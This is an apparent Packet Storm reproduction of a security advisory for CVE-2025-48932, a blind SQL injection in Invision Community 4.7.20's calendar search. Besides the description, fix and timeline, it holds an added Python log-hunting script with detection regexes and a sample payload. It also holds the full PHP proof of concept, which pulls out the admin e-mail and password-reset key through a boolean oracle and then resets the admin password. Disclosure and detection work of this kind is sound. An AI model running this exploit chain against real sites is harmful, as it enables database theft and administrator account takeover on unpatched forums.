
Invision Community 4.7.20 SQL Injection

Published: 23 Jul 2025 | Reported by: EgiX | Source: packetstorm (packetstorm.news)

Invision Community 4.7.20 and earlier allows unauthenticated boolean-based injection via calendar search location with GeoLocation.

Related

Family                  Title                                                          Published
Circl                   CVE-2025-48932                                                 23 Jul 2025 10:13
CNNVD                   Invision Community security vulnerability                      28 Jul 2025 00:00
CVE                     CVE-2025-48932                                                 23 Jul 2025 10:13
Exploit DB              Invision Community 4.7.20 - (calendar/view.php) SQL Injection  28 Jul 2025 00:00
Positive Technologies   PT-2025-30554                                                  23 Jul 2025 00:00
    ----------------------------------------------------------------------------
    Invision Community <= 4.7.20 (calendar/view.php) SQL Injection Vulnerability
    ----------------------------------------------------------------------------
    
    
    [-] Software Link:
    
    https://invisioncommunity.com
    
    
    [-] Affected Versions:
    
    Certain 4.x versions before 4.7.21.
    
    
    [-] Vulnerability Description:
    
    The vulnerability is located within the
    /applications/calendar/modules/front/calendar/view.php script.
    Specifically, in the IPS\calendar\modules\front\calendar\view::search()
    method: user input passed through the "location" request parameter is not
    properly sanitized before being used to construct a SQL query. This can be
    exploited by remote, unauthenticated attackers to e.g. read sensitive data
    from the database through boolean-based SQL Injection attacks. Successful
    exploitation of this vulnerability requires the "calendar" application to
    be installed and a "GeoLocation feature" (like Google Maps) to be
    configured.
    
    NOTE: SQL Injection vulnerabilities in Invision Community 4.x might lead to
    admin account takeover and RCE attacks, by resetting the admin's password.
    However, starting from version 4.7.18, a new security encryption key has
    been introduced within the password reset mechanism. As such, this attack
    vector won't work anymore with versions >= 4.7.18.
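    The following script is an added example, not part of this advisory and not
    Invision Community code: it hunts request logs for the injection described
    above (calendar search, "location" parameter carrying the PoC's boolean
    oracle) and then correlates any hits with lost-password rows for the admin
    account, which is the takeover chain the note above refers to. The log
    format (one JSON object per line with ts, ip and params), the column types
    of core_validating and every sample value are assumptions made for the
    example.

```python
"""
Added example (not part of the advisory or the Invision Community code base):
hunt for CVE-2025-48932 exploitation in request logs and correlate hits with
admin password-reset entries. Log format, column types and sample values are
constructed for this example.
"""
import json
import re
import sqlite3
from collections import Counter
from datetime import datetime, timedelta, timezone

# Markers taken from the published PoC payload: it closes the original quote
# and two parentheses, then builds a boolean oracle on ORD(SUBSTR(...)) whose
# outcome is an invalid regexp ("(") or a valid one ("1") under RLIKE.
INDICATORS = {
    "close_and_or":    re.compile(r"'\)\)\s*OR\s*\(", re.I),
    "char_oracle":     re.compile(r"ORD\s*\(\s*SUBSTR\s*\(", re.I),
    "rlike_if_oracle": re.compile(r"RLIKE\s*\(\s*IF\s*\(", re.I),
    "comment_tail":    re.compile(r"(#|--)\s*$"),
}
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"

def parse_log(text):
    """One JSON object per line (assumed format): ts, ip, params."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def is_calendar_search(req):
    p = req.get("params", {})
    return p.get("app") == "calendar" and p.get("controller") == "view" and p.get("do") == "search"

def matched_indicators(location):
    return [name for name, rx in INDICATORS.items() if rx.search(location or "")]

def find_attempts(requests):
    """Calendar-search requests whose 'location' carries injection markers."""
    hits = []
    for req in requests:
        if not is_calendar_search(req):
            continue
        names = matched_indicators(req["params"].get("location", ""))
        if names:
            hits.append({"ts": req["ts"], "ip": req["ip"], "indicators": names})
    return hits

def requests_per_source(attempts):
    """The PoC needs eight requests per extracted byte, so a source with a
    large count is walking data out bit by bit."""
    return Counter(a["ip"] for a in attempts)

def to_epoch(ts):
    return int(datetime.strptime(ts, TS_FMT).replace(tzinfo=timezone.utc).timestamp())

def admin_resets_after_attempts(conn, attempts, window=3600):
    """Lost-password rows for member_id=1 (the PoC's target) created within
    `window` seconds after the first detected probe. Columns follow the PoC's
    query; types are assumed (entry_date stored as unix time)."""
    if not attempts:
        return []
    first = min(to_epoch(a["ts"]) for a in attempts)
    return conn.execute(
        "SELECT vid, entry_date FROM core_validating "
        "WHERE member_id = 1 AND lost_pass = 1 AND entry_date BETWEEN ? AND ? "
        "ORDER BY entry_date DESC", (first, first + window)).fetchall()

BASE = datetime(2025, 7, 23, 10, 0, 0, tzinfo=timezone.utc)

def build_sample_log():
    """Constructed log: the PoC's eight probes for one byte (the thresholds it
    tries when the target byte is 0x41), one benign search, one unrelated hit."""
    lines = []
    for n, test in enumerate((128, 64, 96, 80, 72, 68, 66, 65)):
        payload = ("'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR((SELECT email FROM core_members "
                   f"WHERE member_id=1),1,1))<{test},0x28,0x31)))#")
        lines.append({"ts": (BASE + timedelta(seconds=n)).strftime(TS_FMT), "ip": "203.0.113.7",
                      "params": {"app": "calendar", "module": "calendar", "controller": "view",
                                 "do": "search", "location": payload}})
    lines.append({"ts": (BASE + timedelta(seconds=30)).strftime(TS_FMT), "ip": "198.51.100.4",
                  "params": {"app": "calendar", "module": "calendar", "controller": "view",
                             "do": "search", "location": "Berlin, Germany"}})
    lines.append({"ts": (BASE + timedelta(seconds=31)).strftime(TS_FMT), "ip": "198.51.100.4",
                  "params": {"app": "core", "module": "system", "controller": "login"}})
    return "\n".join(json.dumps(l) for l in lines)

def build_sample_db():
    """Constructed core_validating rows: one admin reset shortly after the
    probes, one stale admin reset from the day before, one for another member."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE core_validating (vid TEXT, member_id INTEGER, lost_pass INTEGER, entry_date INTEGER)")
    base = int(BASE.timestamp())
    conn.executemany("INSERT INTO core_validating VALUES (?, ?, ?, ?)", [
        ("4f1d2b7c9e", 1, 1, base + 600),
        ("0a0a0a0a0a", 1, 1, base - 86400),
        ("77beef7700", 2, 1, base + 120),
    ])
    return conn

if __name__ == "__main__":
    attempts = find_attempts(parse_log(build_sample_log()))
    for ip, n in requests_per_source(attempts).items():
        print(f"{ip}: {n} injection probes against calendar search")
    for vid, when in admin_resets_after_attempts(build_sample_db(), attempts):
        print(f"admin reset key {vid} issued at {when} after first probe: verify who requested it")
```

    A reset row that lands inside the window is not proof of compromise on its
    own (the admin may have asked for it), but on a version below 4.7.18 it is
    exactly the artefact the PoC reads out, so check the originating IP of the
    reset request against the probing source before closing the case.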
    
    
    [-] Proof of Concept:
    
    https://karmainsecurity.com/pocs/CVE-2025-48932.php
    
    
    [-] Solution:
    
    Upgrade to version 4.7.21 or later.
    
    
    [-] Disclosure Timeline:
    
    [16/05/2025] - Vendor notified
    [27/05/2025] - Version 4.7.21 released
    [28/05/2025] - CVE identifier requested
    [28/05/2025] - CVE identifier assigned
    [23/07/2025] - Public disclosure
    
    
    [-] CVE Reference:
    
    The Common Vulnerabilities and Exposures program (cve.org) has assigned the
    name CVE-2025-48932 to this vulnerability.
    
    
    [-] Credits:
    
    Vulnerability discovered by Egidio Romano.
    
    
    [-] Original Advisory:
    
    http://karmainsecurity.com/KIS-2025-06
    
    
    --- CVE-2025-48932.php poc ---
    
    <?php
    
    /*
        ----------------------------------------------------------------------------
        Invision Community <= 4.7.20 (calendar/view.php) SQL Injection Vulnerability
        ----------------------------------------------------------------------------
    
        author..............: Egidio Romano aka EgiX
        mail................: n0b0d13s[at]gmail[dot]com
        software link.......: https://invisioncommunity.com
    
        +-------------------------------------------------------------------------+
        | This proof of concept code was written for educational purpose only.    |
        | Use it at your own risk. Author will be not responsible for any damage. |
        +-------------------------------------------------------------------------+
    
        [-] Original Advisory:
    
        https://karmainsecurity.com/KIS-2025-06
    */
    
    set_time_limit(0);
    error_reporting(E_ERROR);
    
    if (!extension_loaded("curl")) die("[-] cURL extension required!\n");
    
    if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");
    
    $url = $argv[1];
    $ch = curl_init();
    
    // Start from a clean cookie jar: the csrfKey is tied to the session cookie.
    @unlink("./cookies.txt");
    
    curl_setopt($ch, CURLOPT_URL, "{$url}");
    curl_setopt($ch, CURLOPT_HEADER, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt");
    
    // One GET to obtain a session cookie and the csrfKey that Invision
    // Community embeds in the page's JavaScript.
    if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");
    
    // Base parameters for the vulnerable calendar search action
    // (IPS\calendar\modules\front\calendar\view::search()).
    $params = ["app" => "calendar", "module" => "calendar", "controller" => "view", "do" => "search", "form_submitted" => 1, "csrfKey" => $csrf[1]];
    
    /*
     * Boolean-based blind extraction, one character at a time.
     *
     * Oracle: the injected "location" value evaluates
     *   SELECT 1 RLIKE(IF(ORD(SUBSTR((sql),idx,1)) < test, 0x28, 0x31))
     * When the character code is below $test the regexp is "(" (0x28), an
     * invalid pattern, so MySQL raises an error and the page renders an
     * "elErrorMessage" element; otherwise the regexp is "1" (0x31) and the
     * search succeeds. Each character costs eight requests: the threshold
     * starts at 128 and moves by 2^i in the direction of the last answer.
     */
    function sql_injection($sql)
    {
        global $ch, $params;
    
        $data = "";    // bytes recovered so far
        $min = true;   // true => last probe reported ORD(char) < $test
        $idx = 1;      // 1-based position inside the query result
    
        while (1)
        {
            $test = 256;
    
            for ($i = 7; $i >= 0; $i--)
            {
                $test = $min ? $test - pow(2, $i) : $test + pow(2, $i);
                $params["location"] = "'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR(({$sql}),{$idx},1))<{$test},0x28,0x31)))#";
                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
                $min = preg_match("/elErrorMessage/", curl_exec($ch));
            }
    
            // After eight probes $test pins the value; ORD() of an empty
            // SUBSTR() is 0, which marks the end of the string.
            if (($chr = $min ? $test - 1 : $test) == 0) break;
            $data .= chr($chr);
            $min = true;
            $idx++;
            print "\r[*] Data: {$data}";
        }
    
        return $data;
    }
    
    print "[+] Step 1: fetching admin's e-mail address\n";
    
    $email = sql_injection("SELECT email FROM core_members WHERE member_id=1");
    
    print "\n[+] Step 2: go to {$url}index.php?/lostpassword/ and request a password reset by using the above e-mail. When you're done press enter.";
    
    fgets(STDIN);
    
    print "[+] Step 3: fetching the password reset key\n";
    
    // The reset key is stored in core_validating; read the newest lost-password
    // entry for member_id=1 through the same oracle.
    $vid = sql_injection("SELECT vid FROM core_validating WHERE member_id=1 AND lost_pass=1 ORDER BY entry_date DESC LIMIT 1");
    
    print "\n[+] Step 4: taking over the admin account by resetting their password\n";
    
    // As noted in the advisory, this step only works below 4.7.18, where the
    // reset key alone authorises the password change.
    curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/lostpassword/");
    
    $passwd = md5(time());
    $params = "do=validate&vid={$vid}&mid=1&password={$passwd}&password_confirm={$passwd}&resetpass_submitted=1&csrfKey={$csrf[1]}";
    
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
    
    // CURLOPT_HEADER is on, so the response starts with the status line: a
    // successful reset redirects, a failed one renders the form again.
    if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Attack failed!\n");
    
    print "[+] Pwned! You can now login with {$email}:{$passwd}\n";
